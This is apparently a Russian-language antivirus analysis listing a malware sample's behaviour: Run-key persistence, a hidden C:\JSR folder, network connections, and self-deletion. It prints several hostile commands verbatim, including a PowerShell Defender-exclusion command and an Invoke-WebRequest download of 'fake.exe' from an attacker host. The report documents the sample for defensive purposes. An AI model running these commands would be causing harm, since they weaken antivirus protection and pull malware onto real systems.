Техническая информация
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'JSnodeR' = 'c:\JSR\JSRnode.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\JSR"
- C:\jsr\jsrnode.exe
- C:\jsr\nruntil.exe
- 'localhost':49181
- 'ap#.#pify.org':443
- 'localhost':49184
- 'ds###.vilari.site':443
- 'pk#.goog':80
- http://pk#.goog/gsr1/gsr1.crt
- 'localhost':49181
- 'localhost':49182
- 'ap#.#pify.org':443
- 'localhost':49184
- 'localhost':49185
- 'ds###.vilari.site':443
- DNS ASK ap#.#pify.org
- DNS ASK ds###.vilari.site
- DNS ASK pk#.goog
- 'C:\jsr\jsrnode.exe'
- '<SYSTEM32>\cmd.exe' /c mkdir c:\JSR
- '<SYSTEM32>\cmd.exe' /c attrib +s +h "C:\JSR"
- '<SYSTEM32>\attrib.exe' +s +h "C:\JSR"
- '<SYSTEM32>\cmd.exe' /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\JSR"
- '<SYSTEM32>\cmd.exe' /c start c:\JSR\JSRnode.exe
- '<SYSTEM32>\cmd.exe' /c powershell Invoke-WebRequest -Uri 'https://dstat.vilari.site/femboy/fake.exe' -OutFile %s
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Invoke-WebRequest -Uri 'https://dstat.vilari.site/femboy/fake.exe' -OutFile %s
- '<SYSTEM32>\cmd.exe' /c start /min cmd /c del <Полный путь к файлу>
- '<SYSTEM32>\cmd.exe' /c del <Полный путь к файлу>